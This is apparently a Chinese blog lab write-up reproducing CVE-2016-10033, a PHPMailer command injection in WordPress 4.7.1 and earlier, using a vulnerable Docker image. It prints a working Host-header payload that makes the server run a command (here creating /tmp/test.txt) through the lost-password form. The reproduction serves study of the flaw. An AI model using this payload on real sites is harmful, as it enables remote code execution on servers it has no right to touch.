CVE-2016-10033

发表于

CVE-2016-10033

影响范围

WordPress <= 4.7.1 PHPMailer < 5.2.18

ubuntu 安装docker

1
apt-get install docker docker-compose docker.io

拉取镜像到本地

1
$ docker pull medicean/vulapps:w_wordpress_6

启动环境

1
$ docker run -d -p 80:80 medicean/vulapps:w_wordpress_6

复现过程

1
http://yourip/wp-login.php?action=lostpassword

填入admin,提交,用burp抓包

1557051021247

把Host: 改为:

1
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null)

1557051100918

回显:

1557051131371

查看生成的txt文件

1557051179102

参考

先知